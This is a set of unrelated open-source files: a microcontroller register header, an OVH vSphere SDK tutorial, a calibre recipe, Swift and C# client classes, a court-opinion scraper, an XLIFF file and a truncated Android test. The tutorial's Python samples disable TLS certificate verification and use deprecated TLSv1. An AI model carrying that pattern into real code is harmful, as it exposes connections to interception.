#define REG_TCC0_CC0 (0x42001444) /**< \brief (TCC0) Compare and Capture 0 */
#define REG_TCC0_CC1 (0x42001448) /**< \brief (TCC0) Compare and Capture 1 */
#define REG_TCC0_CC2 (0x4200144C) /**< \brief (TCC0) Compare and Capture 2 */
#define REG_TCC0_CC3 (0x42001450) /**< \brief (TCC0) Compare and Capture 3 */
#define REG_TCC0_PATTBUF (0x42001464) /**< \brief (TCC0) Pattern Buffer */
#define REG_TCC0_WAVEBUF (0x42001468) /**< \brief (TCC0) Waveform Control Buffer */
#define REG_TCC0_PERBUF (0x4200146C) /**< \brief (TCC0) Period Buffer */
#define REG_TCC0_CCBUF0 (0x42001470) /**< \brief (TCC0) Compare and Capture Buffer 0 */
#define REG_TCC0_CCBUF1 (0x42001474) /**< \brief (TCC0) Compare and Capture Buffer 1 */
#define REG_TCC0_CCBUF2 (0x42001478) /**< \brief (TCC0) Compare and Capture Buffer 2 */
#define REG_TCC0_CCBUF3 (0x4200147C) /**< \brief (TCC0) Compare and Capture Buffer 3 */
#else
#define REG_TCC0_CTRLA (*(RwReg *)0x42001400UL) /**< \brief (TCC0) Control A */
#define REG_TCC0_CTRLBCLR (*(RwReg8 *)0x42001404UL) /**< \brief (TCC0) Control B Clear */
#define REG_TCC0_CTRLBSET (*(RwReg8 *)0x42001405UL) /**< \brief (TCC0) Control B Set */
#define REG_TCC0_SYNCBUSY (*(RoReg *)0x42001408UL) /**< \brief (TCC0) Synchronization Busy */
#define REG_TCC0_FCTRLA (*(RwReg *)0x4200140CUL) /**< \brief (TCC0) Recoverable Fault A Configuration */
#define REG_TCC0_FCTRLB (*(RwReg *)0x42001410UL) /**< \brief (TCC0) Recoverable Fault B Configuration */
#define REG_TCC0_WEXCTRL (*(RwReg *)0x42001414UL) /**< \brief (TCC0) Waveform Extension Configuration */
#define REG_TCC0_DRVCTRL (*(RwReg *)0x42001418UL) /**< \brief (TCC0) Driver Control */
#define REG_TCC0_DBGCTRL (*(RwReg8 *)0x4200141EUL) /**< \brief (TCC0) Debug Control */
#define REG_TCC0_EVCTRL (*(RwReg *)0x42001420UL) /**< \brief (TCC0) Event Control */
#define REG_TCC0_INTENCLR (*(RwReg *)0x42001424UL) /**< \brief (TCC0) Interrupt Enable Clear */
#define REG_TCC0_INTENSET (*(RwReg *)0x42001428UL) /**< \brief (TCC0) Interrupt Enable Set */
#define REG_TCC0_INTFLAG (*(RwReg *)0x4200142CUL) /**< \brief (TCC0) Interrupt Flag Status and Clear */
#define REG_TCC0_STATUS (*(RwReg *)0x42001430UL) /**< \brief (TCC0) Status */
#define REG_TCC0_COUNT (*(RwReg *)0x42001434UL) /**< \brief (TCC0) Count */
#define REG_TCC0_PATT (*(RwReg16*)0x42001438UL) /**< \brief (TCC0) Pattern */
#define REG_TCC0_WAVE (*(RwReg *)0x4200143CUL) /**< \brief (TCC0) Waveform Control */
#define REG_TCC0_PER (*(RwReg *)0x42001440UL) /**< \brief (TCC0) Period */
#define REG_TCC0_CC0 (*(RwReg *)0x42001444UL) /**< \brief (TCC0) Compare and Capture 0 */
#define REG_TCC0_CC1 (*(RwReg *)0x42001448UL) /**< \brief (TCC0) Compare and Capture 1 */
#define REG_TCC0_CC2 (*(RwReg *)0x4200144CUL) /**< \brief (TCC0) Compare and Capture 2 */
#define REG_TCC0_CC3 (*(RwReg *)0x42001450UL) /**< \brief (TCC0) Compare and Capture 3 */
#define REG_TCC0_PATTBUF (*(RwReg16*)0x42001464UL) /**< \brief (TCC0) Pattern Buffer */
#define REG_TCC0_WAVEBUF (*(RwReg *)0x42001468UL) /**< \brief (TCC0) Waveform Control Buffer */
#define REG_TCC0_PERBUF (*(RwReg *)0x4200146CUL) /**< \brief (TCC0) Period Buffer */
#define REG_TCC0_CCBUF0 (*(RwReg *)0x42001470UL) /**< \brief (TCC0) Compare and Capture Buffer 0 */
#define REG_TCC0_CCBUF1 (*(RwReg *)0x42001474UL) /**< \brief (TCC0) Compare and Capture Buffer 1 */
#define REG_TCC0_CCBUF2 (*(RwReg *)0x42001478UL) /**< \brief (TCC0) Compare and Capture Buffer 2 */
#define REG_TCC0_CCBUF3 (*(RwReg *)0x4200147CUL) /**< \brief (TCC0) Compare and Capture Buffer 3 */
#endif /* (defined(__ASSEMBLY__) || defined(__IAR_SYSTEMS_ASM__)) */
/* ========== Instance parameters for TCC0 peripheral ========== */
#define TCC0_CC_NUM 4 // Number of Compare/Capture units
#define TCC0_DITHERING 1 // Dithering feature implemented
#define TCC0_DMAC_ID_MC_0 12
#define TCC0_DMAC_ID_MC_1 13
#define TCC0_DMAC_ID_MC_2 14
#define TCC0_DMAC_ID_MC_3 15
#define TCC0_DMAC_ID_MC_LSB 12
#define TCC0_DMAC_ID_MC_MSB 15
#define TCC0_DMAC_ID_MC_SIZE 4
#define TCC0_DMAC_ID_OVF 11 // DMA overflow/underflow/retrigger trigger
#define TCC0_DTI 1 // Dead-Time-Insertion feature implemented
#define TCC0_EXT 31 // Coding of implemented extended features
#define TCC0_GCLK_ID 25 // Index of Generic Clock
#define TCC0_OTMX 1 // Output Matrix feature implemented
#define TCC0_OW_NUM 8 // Number of Output Waveforms
#define TCC0_PG 1 // Pattern Generation feature implemented
#define TCC0_SIZE 24
#define TCC0_SWAP 1 // DTI outputs swap feature implemented
#define TCC0_TYPE 1 // TCC type 0 : NA, 1 : Master, 2 : Slave
#endif /* _SAML21_TCC0_INSTANCE_ */
| {
"pile_set_name": "Github"
} |
---
title: Using the vSphere SDK
slug: using-sdk-vsphere
excerpt: Find out how to implement and use the vSphere SDK
section: VMware vSphere features
order: 10
---
**Last updated 13th July 2020**
## Objective
Actions within your infrastructure can be automated using the vSphere SDK.
**This guide explains the implementation and usage in various programming languages.**
## Instructions
### Python
#### Setting up the environment
##### OS
This example uses a VM installed with Debian 9, deployed from [templates available for your Hosted Private Cloud infrastructure](https://docs.ovh.com/gb/en/private-cloud/deploy-ovh-template/).
##### Requirements
It is necessary to install these packages:
```
apt-get install python git python-pip
```
##### vSphere SDK
Download the vSphere SDK with the following command:
```
git clone https://github.com/vmware/vsphere-automation-sdk-python.git
```
The directory "/vsphere-automation-sdk-python" will be created. Switch to this folder to perform the installation command:
```
pip install --upgrade --force-reinstall -r requirements.txt --extra-index-url file:///<absolute_path_to_sdk>/lib
```
In this example, it is the following command:
```
pip install --upgrade --force-reinstall -r requirements.txt --extra-index-url file:///root/vsphere-automation-sdk-python/lib
```
Once the SDK is installed, you can make use of scripts.
#### Script example
##### Connection
This example tests the connection and disconnection to vCenter. It will also help to verify if everything is properly installed.
```python
#!/usr/bin/env python
import time
import atexit
import ssl
from pyVim import connect
from pyVmomi import vim
def vconnect():
s = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
s.verify_mode = ssl.CERT_NONE
service_instance = connect.SmartConnect(host="pcc-149-202-xxx-xxx.ovh.com",
user="damien",
pwd="MyPassword",
sslContext=s)
atexit.register(connect.Disconnect, service_instance)
print("Connecting....")
time.sleep(2)
print("Disconnecting..")
vconnect()
```
##### Listing the VMs of a Private Cloud infrastructure
This example lists all VMs of a Private Cloud infrastructure.
```python
#!/usr/bin/env python
import time
import atexit
import ssl
from pyVim import connect
from pyVmomi import vim
def vconnect():
s = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
s.verify_mode = ssl.CERT_NONE
service_instance = connect.SmartConnect(host="pcc-149-202-xxx-xxx.ovh.com",
user="damien",
pwd="MyPassword",
sslContext=s)
atexit.register(connect.Disconnect, service_instance)
print("Connecting....")
time.sleep(2)
content = service_instance.RetrieveContent()
container = content.rootFolder
viewType = [vim.VirtualMachine]
recursive = True
containerView = content.viewManager.CreateContainerView(container, viewType, recursive)
children = containerView.view
for child in children:
summary = child.summary
print(summary.config.name)
time.sleep(2)
print("Disconnecting...")
vconnect()
```
### Perl
#### Setting up the environment
##### OS
This example uses a VM installed with Ubuntu 18.04, deployed from [templates available for your Hosted Private Cloud infrastructure](https://docs.ovh.com/gb/en/private-cloud/deploy-ovh-template/).
##### Requirements
It is necessary to install these packages:
```
apt-get install lib32z1 lib32ncurses5 uuid uuid-dev libssl-dev perl-doc libxml-libxml-perl libcrypt-ssleay-perl libsoap-lite-perl libdata-compare-perl libmodule-build-perl libuuid-perl libsocket6-perl libnet-inet6glue-perl libarchive-zip-perl
```
```
cpan install Crypt::OpenSSL::RSA UUID::Random Exception::Class Crypt::X509 List::MoreUtils
```
##### vSphere SDK
Download the vSphere SDK using this link:
[https://my.vmware.com/group/vmware/get-download?downloadGroup=VS-PERL-SDK67](https://my.vmware.com/group/vmware/get-download?downloadGroup=VS-PERL-SDK67)
Make sure to download the version that is compatible with your operating system.
In this example the file downloaded is: "VMware-vSphere-Perl-SDK-6.7.0-8156551.x86_64.tar.gz"
Extract the file you just downloaded using this command:
```
tar –zxvf VMware-vSphere-Perl-SDK-6.7.0-8156551.x86_64.tar.gz
```
Start the installer using the following commands:
```
cd vmware-vsphere-cli-distrib
```
```
./vmware-install.pl
```
After reading the terms, accept them and continue by pressing `Enter`{.action}.
After the installation, additional modules will be installed. Hit `Enter`{.action} to continue the installation.
In order to complete the installation, you will need to select a directory in which the SDK will install. By default, the directory is "/usr/bin".
#### Script example
##### Connection
This example tests the connection and disconnection to vCenter. It will also help to verify if everything is properly installed.
```perl
#!/usr/bin/perl
use strict;
use VMware::VIRuntime;
Opts::set_option('server', 'pcc-149-202-xxx-xxx.ovh.com');
Opts::set_option('username', 'damien');
Opts::set_option('password', 'MyPassword')
print "Connecting \n";
Util::connect();
Util::disconnect();
print "Disconnected \n";
```
##### Listing the VMs of a Private Cloud infrastructure
This example lists all VMs of a Private Cloud infrastructure.
```perl
#!/usr/bin/perl
use strict;
use Data::Dumper;
use VMware::VIRuntime;
Opts::set_option('server', 'pcc-149-202-xxx-xxx.ovh.com');
Opts::set_option('username', 'damien');
Opts::set_option('password', 'MyPassword');
print "Connecting \n";
Util::connect();
my $vm_views =
Vim::find_entity_views(view_type => 'VirtualMachine',
properties => ['name'], );
foreach my $view ( sort @$vm_views) {
print ' - '.$view->{'name'}, "\n";
}
Util::disconnect();
print "Disconnected \n";
```
##### Using samples
In this example, a script that is already created and present in the directory "vmware-vsphere-cli-distrib/apps/vm/" is called.
Here is a list of the scripts already available in this directory:
```
ls vmware-vsphere-cli-distrib/apps/vm/
guestinfo.pl sharesmanager.pl snapshotmanager.pl vdiskcreate.pl vmclone.pl vmcontrol.pl vmcreate.pl vminfo.pl vmmigrate.pl vmreconfig.pl vmregister.pl vmsnapshot.pl vmtemplate.pl
```
To create a snapshot "test" of the VM "Debian1", use this command (replacing the example placeholders with your credentials):
```
perl snapshotmanager.pl --server pcc-149-202-xxx-xxx.ovh.com --username damien --password MyPassword --operation create --vmname Debian1 --snapshotname test
```
## Go further
Join our community of users on <https://community.ovh.com/en/>.
| {
"pile_set_name": "Github"
} |
from calibre.web.feeds.news import BasicNewsRecipe
from calibre.ebooks.BeautifulSoup import Tag
def new_tag(soup, name, attrs=()):
impl = getattr(soup, 'new_tag', None)
if impl is not None:
return impl(name, attrs=dict(attrs))
return Tag(soup, name, attrs=attrs or None)
class VrijNederlandRecipe(BasicNewsRecipe):
__license__ = 'GPL v3'
__author__ = 'kwetal'
language = 'nl'
locale = 'nl'
version = 1
title = u'Vrij Nederland'
publisher = u'Weekbladpers Tijdschriften'
category = u'News, Opinion'
description = u'Weekly opinion magazine from the Netherlands'
oldest_article = 7
max_articles_per_feed = 100
use_embedded_content = False
no_stylesheets = True
remove_javascript = True
conversion_options = {'publisher': publisher,
'tags': category, 'comments': description}
feeds = []
feeds.append((u'Politiek', u'http://www.vn.nl/politiek.rss'))
feeds.append((u'Buitenland', u'http://www.vn.nl/buitenland.rss'))
feeds.append((u'Economie', u'http://www.vn.nl/economie.rss'))
feeds.append((u'Justitie', u'http://www.vn.nl/justitie.rss'))
feeds.append((u'Samenleving', u'http://www.vn.nl/samenleving.rss'))
feeds.append((u'Crime', u'http://www.vn.nl/crime.rss'))
feeds.append((u'Media', u'http://www.vn.nl/media.rss'))
feeds.append((u'De Republiek der Letteren',
u'http://www.vn.nl/republiek.rss'))
feeds.append((u'Max van Weezel', u'http://www.vn.nl/vanweezel.rss'))
feeds.append((u'Ko Colijn', u'http://www.vn.nl/colijn.rss'))
feeds.append((u'Kees Kraaijeveld', u'http://www.vn.nl/kraaijeveld.rss'))
feeds.append((u'Frank Kalshoven', u'http://www.vn.nl/kalshoven.rss'))
feeds.append((u'Stephan Sanders', u'http://www.vn.nl/sanders.rss'))
feeds.append((u'Micha Wertheim', u'http://www.vn.nl/wertheim.rss'))
feeds.append((u'Arnon Grunberg', u'http://www.vn.nl/grunberg.rss'))
feeds.append((u'Carel Peeters', u'http://www.vn.nl/carelpeeters.rss'))
keep_only_tags = [
dict(name='div', attrs={'class': 'cl-column column-one'})]
remove_tags = []
remove_tags.append(
dict(name='div', attrs={'class': 'wpg-element guest-book-overview'}))
remove_tags.append(
dict(name='div', attrs={'class': 'wpg-element forum-message-form'}))
remove_tags.append(dict(name='div', attrs={'class': 'mediaterms'}))
remove_tags.append(dict(name='div', attrs={'class': 'label-term'}))
remove_tags.append(dict(name='div', attrs={
'class': 'wpg-element Media-Collection-Element-Artikel-Lijst'}))
remove_tags.append(dict(name='object'))
remove_tags.append(dict(name='link'))
remove_tags.append(dict(name='meta'))
def preprocess_html(self, soup):
# Just clean up the result a little
meta = soup.find('div', attrs={'class': 'meta'})
if meta:
link = meta.find('span', attrs={'class': 'link'})
if link:
link.extract()
for seperator in meta.findAll('span', attrs={'class': 'seperator'}):
seperator.extract()
# Their header is full of 'if IE6/7/8' tags. Just get rid of it
# altogether
theirHead = soup.head
theirHead.extract()
myHead = new_tag(soup, 'head')
soup.insert(0, myHead)
return soup
| {
"pile_set_name": "Github"
} |
//
// Client.swift
// MastodonKit
//
// Created by Ornithologist Coder on 4/22/17.
// Copyright © 2017 MastodonKit. All rights reserved.
//
import Foundation
public struct Client: ClientType {
let baseURL: String
let session: URLSession
// enum Constant: String {
// case sessionID = "com.shi.Mast.bgSession"
// }
// var session: URLSession = {
// let config = URLSessionConfiguration.background(withIdentifier: Constant.sessionID.rawValue)
// config.isDiscretionary = true
// config.sessionSendsLaunchEvents = true
// return URLSession(configuration: config, delegate: nil, delegateQueue: nil)
// }()
public var accessToken: String?
public init(baseURL: String, accessToken: String? = nil, session: URLSession = .shared) {
self.baseURL = baseURL
self.session = session
self.accessToken = accessToken
}
public func run<Model>(_ request: Request<Model>, completion: @escaping (Result<Model>) -> Void) {
DispatchQueue.global(qos: .userInitiated).async {
guard
let components = URLComponents(baseURL: self.baseURL, request: request),
let url = components.url
else {
completion(.failure(ClientError.malformedURL))
return
}
let urlRequest = URLRequest(url: url, request: request, accessToken: self.accessToken)
let task = self.session.dataTask(with: urlRequest) { data, response, error in
if let error = error {
completion(.failure(error))
return
}
guard let data = data else {
completion(.failure(ClientError.malformedJSON))
return
}
guard
let httpResponse = response as? HTTPURLResponse,
httpResponse.statusCode == 200
else {
let mastodonError = try? MastodonError.decode(data: data)
let error: ClientError = mastodonError.map { .mastodonError($0.description) } ?? .genericError
completion(.failure(error))
return
}
guard let model = try? Model.decode(data: data) else {
completion(.failure(ClientError.invalidModel))
return
}
completion(.success(model, httpResponse.pagination))
}
task.resume()
}
}
}
| {
"pile_set_name": "Github"
} |
using System.Collections.Generic;
using AsterNET.Manager.Response;
namespace AsterNET.Manager.Action
{
/// <summary>
/// The UpdateConfigAction sends an UpdateConfig command to the asterisk server.
/// Please take note that unlike the manager documentation, this command does not
/// dump back the config file upon success -- it only tells you it succeeded. You
/// should use the handy addCommand method this class provides for specifying
/// what actions you would like to take on the configuration file. It will
/// generate appropriate sequence numbers for the command. You may use the static
/// ACTION_* fields provided by this action to specify what action you would like
/// to take, while avoiding handling the strings required. Plain fields:<br />
/// SrcFilename: Configuration filename to read(e.g. foo.conf)<br />
/// DstFilename: Configuration filename to write(e.g. foo.conf)<br />
/// Reload: Whether or not a reload should take place (or name of specific module)<br />
/// Repeatable fields:<br />
/// Action-XXXXXX: Action to Take (NewCat,RenameCat,DelCat,Update,Delete,Append)<br />
/// Cat-XXXXXX: Category to operate on<br />
/// Var-XXXXXX: Variable to work on<br />
/// Value-XXXXXX: Value to work on<br />
/// Match-XXXXXX: Extra match required to match line
/// </summary>
public class UpdateConfigAction : ManagerActionResponse
{
public const string ACTION_NEWCAT = "newcat";
public const string ACTION_RENAMECAT = "renamecat";
public const string ACTION_DELCAT = "delcat";
public const string ACTION_UPDATE = "update";
public const string ACTION_DELETE = "delete";
public const string ACTION_APPEND = "append";
private readonly Dictionary<string, string> actions;
private int actionCounter;
/// <summary>
/// Creates a new UpdateConfigAction.
/// </summary>
public UpdateConfigAction()
{
actionCounter = 0;
actions = new Dictionary<string, string>();
}
/// <summary>
/// Creates a new UpdateConfigAction.
/// </summary>
public UpdateConfigAction(string srcFilename, string dstFilename, string reload)
: this()
{
SrcFileName = srcFilename;
DstFileName = dstFilename;
this.Reload = reload;
}
/// <summary>
/// Creates a new UpdateConfigAction.
/// </summary>
public UpdateConfigAction(string srcFilename, string dstFilename, bool reload)
: this()
{
SrcFileName = srcFilename;
DstFileName = dstFilename;
this.Reload = (reload ? "true" : "");
}
/// <summary>
/// Creates a new UpdateConfigAction.
/// </summary>
public UpdateConfigAction(string srcFilename, string dstFilename)
: this()
{
SrcFileName = srcFilename;
DstFileName = dstFilename;
Reload = "";
}
/// <summary>
/// Get/Set the destination filename.
/// </summary>
public string DstFileName { get; set; }
/// <summary>
/// Get/Set the source filename.
/// </summary>
public string SrcFileName { get; set; }
/// <summary>
/// Get/Set the reload behavior of this action (yes), or sets a specific module (name) to be reloaded.<br />
/// Set to empty string to update without reload.
/// </summary>
public string Reload { get; set; }
/// <summary>
/// Get the name of this action.
/// </summary>
public override string Action
{
get { return "UpdateConfig"; }
}
#region AddCommand(...)
/// <summary>
/// Adds a command to update a config file while sparing you the details of
/// the Manager's required syntax. If you want to omit one of the command's
/// sections, provide a null value to this method. The command index will be
/// incremented even if you supply a null for all parameters, though the action
/// will be unaffected.
/// </summary>
/// <param name="action">Action to Take (NewCat,RenameCat,DelCat,Update,Delete,Append)</param>
/// <param name="category">Category to operate on</param>
/// <param name="variable">Variable to work on</param>
/// <param name="value">Value to work on</param>
/// <param name="match">Extra match required to match line</param>
/// <param name="options">Extra match required to match line</param>
public void AddCommand(string action, string category, string variable, string value, string match, string options)
{
var i = actionCounter++;
var index = i.ToString().PadLeft(6, '0');
if (!string.IsNullOrEmpty(action))
actions.Add("Action-" + index, action);
if (!string.IsNullOrEmpty(category))
actions.Add("Cat-" + index, category);
if (!string.IsNullOrEmpty(variable))
actions.Add("Var-" + index, variable);
if (!string.IsNullOrEmpty(value))
actions.Add("Value-" + index, value);
if (!string.IsNullOrEmpty(match))
actions.Add("Match-" + index, match);
if (!string.IsNullOrEmpty(options))
Actions.Add("Options-" + index, options);
}
public void AddCommand(string action, string category, string variable, string value, string match)
{
AddCommand(action, category, variable, value, match, null);
}
public void AddCommand(string action, string category, string variable, string value)
{
AddCommand(action, category, variable, value, null, null);
}
public void AddCommand(string action, string category, string variable)
{
AddCommand(action, category, variable, null, null, null);
}
public void AddCommand(string action, string category)
{
AddCommand(action, category, null, null, null, null);
}
public void AddCommand(string action)
{
AddCommand(action, null, null, null, null, null);
}
public void AddCommand()
{
AddCommand(null, null, null, null, null, null);
}
#endregion
#region Actions
/// <summary>
/// Dictionary of the action's desired operations where Map keys contain:<br />
/// action,cat,var,value,match pairs followed by -XXXXXX, and the values contain the values for those keys.
/// This method will typically only be used by the ActionBuilder to generate the actual strings to be sent to the
/// manager interface.
/// </summary>
public Dictionary<string, string> Actions
{
get { return actions; }
}
#endregion
public override object ActionCompleteResponseClass()
{
return new ManagerResponse();
}
}
} | {
"pile_set_name": "Github"
} |
ramstage-$(CONFIG_DRIVERS_INTEL_SOUNDWIRE) += soundwire.c
| {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
# Scraper for Pennsylvania Supreme Court
# CourtID: pa
# Court Short Name: pa
import re
from juriscraper.OpinionSite import OpinionSite
from juriscraper.lib.string_utils import convert_date_string
from juriscraper.lib.string_utils import clean_string
class Site(OpinionSite):
def __init__(self, *args, **kwargs):
super(Site, self).__init__(*args, **kwargs)
self.court_id = self.__module__
self.regex = False
self.url = "http://www.pacourts.us/assets/rss/SupremeOpinionsRss.ashx"
self.set_regex(r"(.*)(?:[,-]?\s+Nos?\.)(.*)")
self.base = (
"//item[not(contains(title/text(), 'Judgment List'))]"
"[not(contains(title/text(), 'Reargument Table'))]"
"[contains(title/text(), 'No.')]"
)
self.cases = []
def _download(self, request_dict={}):
html = super(Site, self)._download(request_dict)
self._extract_case_data_from_html(html)
return html
def _extract_case_data_from_html(self, html):
for item in html.xpath(self.base):
creator = item.xpath("./creator")[0].text_content()
pubdate = item.xpath("./pubdate")[0].text_content()
pubdate_sanitized = self.sanitize_text(pubdate)
title = item.xpath("./title")[0].text_content()
title_sanitized = self.sanitize_text(title)
title_clean = clean_string(title_sanitized)
search = self.regex.search(title_clean)
url = item.xpath(".//@href")[0]
if search:
name = search.group(1)
docket = search.group(2)
else:
name = title_clean
docket = self._extract_docket_from_url(url)
self.cases.append(
{
"name": name,
"date": convert_date_string(pubdate_sanitized),
"docket": docket,
"judge": self.sanitize_text(creator),
"url": url,
}
)
def _extract_docket_from_url(self, url):
"""Sometimes the court doesnt include the docket number in the title,
in which case we need to derive it based on the opinion url (it is
included in the PDF file name)
"""
parts = url.split("/")[-1].split("CD")
number = parts[0]
year_suffix_text = parts[1].split("_")[0]
year_suffix = re.sub(
"[^0-9]", "", year_suffix_text
) # Strip non-numeric characters
return "%s C.D. 20%s" % (number, year_suffix)
def _get_case_names(self):
return [case["name"] for case in self.cases]
def _get_download_urls(self):
return [case["url"] for case in self.cases]
def _get_case_dates(self):
return [case["date"] for case in self.cases]
def _get_precedential_statuses(self):
return ["Published"] * len(self.cases)
def _get_docket_numbers(self):
return [case["docket"] for case in self.cases]
def _get_judges(self):
return [case["judge"] for case in self.cases]
def sanitize_text(self, text):
text = clean_string(text)
return text.replace(r"\n", "\n").replace(u"–", "-")
def set_regex(self, pattern):
self.regex = re.compile(pattern)
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xliff PUBLIC "-//XLIFF//DTD XLIFF//EN" "http://www.oasis-open.org/committees/xliff/documents/xliff.dtd">
<xliff version="1.0">
<file source-language="en" target-language="he" datatype="plaintext" original="messages" date="2018-09-09T08:23:38Z" product-name="messages">
<header/>
<body>
<trans-unit id="1">
<source>Group %1%</source>
<target/>
</trans-unit>
<trans-unit id="2">
<source>Main area</source>
<target/>
</trans-unit>
<trans-unit id="3">
<source>Cancel</source>
<target/>
</trans-unit>
<trans-unit id="4">
<source>Save</source>
<target/>
</trans-unit>
<trans-unit id="5">
<source>Create</source>
<target/>
</trans-unit>
<trans-unit id="6">
<source>All %1%</source>
<target/>
</trans-unit>
<trans-unit id="7">
<source>All privileges</source>
<target/>
</trans-unit>
<trans-unit id="8">
<source>Are you sure you want to delete %1%?</source>
<target/>
</trans-unit>
<trans-unit id="9">
<source>Delete</source>
<target/>
</trans-unit>
<trans-unit id="10">
<source>Edit %1% permissions</source>
<target/>
</trans-unit>
<trans-unit id="11">
<source>Edit permissions</source>
<target/>
</trans-unit>
<trans-unit id="12">
<source>Add permissions by %1%</source>
<target/>
</trans-unit>
<trans-unit id="13">
<source>Add %1%</source>
<target/>
</trans-unit>
<trans-unit id="14">
<source>%1% name</source>
<target/>
</trans-unit>
<trans-unit id="15">
<source>Action</source>
<target/>
</trans-unit>
<trans-unit id="16">
<source>Permissions</source>
<target/>
</trans-unit>
<trans-unit id="17">
<source>Grant</source>
<target/>
</trans-unit>
<trans-unit id="18">
<source>Deny</source>
<target/>
</trans-unit>
<trans-unit id="19">
<source>Inherit</source>
<target/>
</trans-unit>
<trans-unit id="20">
<source>Taxonomy: %1%</source>
<target/>
</trans-unit>
<trans-unit id="21">
<source>%1%: %2%</source>
<target/>
</trans-unit>
<trans-unit id="22">
<source>Permission</source>
<target/>
</trans-unit>
<trans-unit id="23">
<source>Edit %1% permissions of %2%</source>
<target/>
</trans-unit>
<trans-unit id="24">
<source>Permissions for all %1%</source>
<target/>
</trans-unit>
<trans-unit id="25">
<source>Permissions by taxonomy</source>
<target/>
</trans-unit>
<trans-unit id="26">
<source>Taxonomy name</source>
<target/>
</trans-unit>
<trans-unit id="27">
<source>Add permissions by taxonomy</source>
<target/>
</trans-unit>
<trans-unit id="28">
<source>Add taxonomy</source>
<target/>
</trans-unit>
<trans-unit id="29">
<source>Group details</source>
<target/>
</trans-unit>
<trans-unit id="30">
<source>Name</source>
<target/>
</trans-unit>
<trans-unit id="31">
<source>Description</source>
<target/>
</trans-unit>
<trans-unit id="32">
<source>Translate</source>
<target/>
</trans-unit>
<trans-unit id="33">
<source>List groups</source>
<target/>
</trans-unit>
<trans-unit id="34">
<source>Group</source>
<target/>
</trans-unit>
<trans-unit id="35">
<source>Members</source>
<target/>
</trans-unit>
<trans-unit id="36">
<source>Add new</source>
<target/>
</trans-unit>
<trans-unit id="37">
<source>Edit</source>
<target/>
</trans-unit>
<trans-unit id="38">
<source>Return to group list</source>
<target/>
</trans-unit>
<trans-unit id="39">
<source>Permissions by %1%</source>
<target/>
</trans-unit>
</body>
</file>
</xliff>
| {
"pile_set_name": "Github"
} |
/*
* Copyright 2018 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.google.samples.apps.iosched.ui.signin
import android.net.Uri
import androidx.arch.core.executor.testing.InstantTaskExecutorRule
import com.google.samples.apps.iosched.androidtest.util.LiveDataTestUtil
import com.google.samples.apps.iosched.androidtest.util.observeForTesting
import com.google.samples.apps.iosched.shared.data.signin.AuthenticatedUserInfoBasic
import com.google.samples.apps.iosched.shared.domain.auth.ObserveUserAuthStateUseCase
import com.google.samples.apps.iosched.shared.domain.prefs.NotificationsPrefIsShownUseCase
import com.google.samples.apps.iosched.shared.result.Result
import com.google.samples.apps.iosched.test.data.CoroutineScope
import com.google.samples.apps.iosched.test.data.MainCoroutineRule
import com.google.samples.apps.iosched.test.data.runBlockingTest
import com.google.samples.apps.iosched.test.util.fakes.FakePreferenceStorage
import com.google.samples.apps.iosched.ui.schedule.FakeObserveUserAuthStateUseCase
import com.nhaarman.mockito_kotlin.doReturn
import com.nhaarman.mockito_kotlin.mock
import junit.framework.TestCase.assertEquals
import junit.framework.TestCase.assertFalse
import kotlinx.coroutines.CoroutineDispatcher
import org.junit.Assert.assertTrue
import org.junit.Rule
import org.junit.Test
/**
* Tests for [FirebaseSignInViewModelDelegate]
*/
class FirebaseSignInViewModelDelegateTest {
// Executes tasks in the Architecture Components in the same thread
@get:Rule
var instantTaskExecutorRule = InstantTaskExecutorRule()
// Overrides Dispatchers.Main used in Coroutines
@get:Rule
var coroutineRule = MainCoroutineRule()
@Test
fun testSignedOut() = coroutineRule.runBlockingTest {
val subject = createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase = FakeObserveUserAuthStateUseCase(
user = Result.Success(null),
isRegistered = Result.Success(false),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher
)
)
subject.currentUserInfo.observeForTesting {
val currentFirebaseUser = LiveDataTestUtil.getValue(subject.currentUserInfo)
assertEquals(
null,
currentFirebaseUser?.getUid()
)
assertEquals(
null,
LiveDataTestUtil.getValue(subject.currentUserImageUri)
)
assertFalse(subject.isSignedIn())
}
}
@Test
fun testSignedInRegistered() = coroutineRule.runBlockingTest {
val user = mock<AuthenticatedUserInfoBasic> {
on { getUid() }.doReturn("123")
on { getPhotoUrl() }.doReturn(mock<Uri> {})
on { isSignedIn() }.doReturn(true)
}
val fakeObserveUserAuthStateUseCase = FakeObserveUserAuthStateUseCase(
user = Result.Success(user),
isRegistered = Result.Success(true),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher
)
val subject = createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase = fakeObserveUserAuthStateUseCase
)
// Observe signIn and registeredUser so messages are received
subject.observeSignedInUser().observeForever { }
subject.observeRegisteredUser().observeForever { }
assertEquals(
user.getUid(),
LiveDataTestUtil.getValue(subject.currentUserInfo)?.getUid()
)
assertEquals(
user.getPhotoUrl(),
LiveDataTestUtil.getValue(subject.currentUserImageUri)
)
assertTrue(subject.isSignedIn())
assertTrue(subject.isRegistered())
}
@Test
fun testSignedInNotRegistered() = coroutineRule.runBlockingTest {
val user = mock<AuthenticatedUserInfoBasic> {
on { getUid() }.doReturn("123")
on { getPhotoUrl() }.doReturn(mock<Uri> {})
on { isSignedIn() }.doReturn(true)
}
val fakeObserveUserAuthStateUseCase = FakeObserveUserAuthStateUseCase(
user = Result.Success(user),
isRegistered = Result.Success(false),
coroutineScope = coroutineRule.CoroutineScope(),
coroutineDispatcher = coroutineRule.testDispatcher
)
val subject = createFirebaseSignInViewModelDelegate(
observeUserAuthStateUseCase = fakeObserveUserAuthStateUseCase
)
// Observe signIn and registeredUser so messages are received
subject.observeSignedInUser().observeForever { }
subject.observeRegisteredUser().observeForever { }
assertEquals(
user.getUid(),
